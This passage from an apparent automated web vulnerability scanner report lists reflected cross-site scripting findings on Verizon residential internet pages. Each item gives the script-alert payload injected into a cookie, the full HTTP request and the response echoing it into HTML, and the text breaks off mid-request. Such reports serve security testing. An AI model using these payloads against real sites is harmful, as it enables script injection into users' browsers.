NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74917
Expires: Sat, 20 Nov 2010 03:15:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX2d1ec'><script>alert(1)</script>5088e34c333; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2D1EC'><SCRIPT>ALERT(1)</SCRIPT>5088E34C333 ' />
...[SNIP]...

1.108. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dd0c6<script>alert(1)</script>63779292418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdd0c6<script>alert(1)</script>63779292418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73317
Expires: Sat, 20 Nov 2010 03:15:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXdd0c6<script>alert(1)</script>63779292418; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD0C6<SCRIPT>ALERT(1)</SCRIPT>63779292418 </DIV>
...[SNIP]...

1.109. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 81278<script>alert(1)</script>87264888db4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX81278<script>alert(1)</script>87264888db4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX81278<script>alert(1)</script>87264888db4; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX81278<SCRIPT>ALERT(1)</SCRIPT>87264888DB4 </DIV>
...[SNIP]...

1.110. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16bd1'><script>alert(1)</script>1c358468da2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX16bd1'><script>alert(1)</script>1c358468da2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74937
Expires: Sat, 20 Nov 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX16bd1'><script>alert(1)</script>1c358468da2; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX16BD1'><SCRIPT>ALERT(1)</SCRIPT>1C358468DA2 ' />
...[SNIP]...

1.111. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fca0<script>alert(1)</script>ac910a19ffb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9fca0<script>alert(1)</script>ac910a19ffb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 00:13:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9fca0<script>alert(1)</script>ac910a19ffb; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9FCA0<SCRIPT>ALERT(1)</SCRIPT>AC910A19FFB </DIV>
...[SNIP]...

1.112. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74936
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' />
...[SNIP]...

1.113. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e2e1'><script>alert(1)</script>1e4a8a0e625 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; 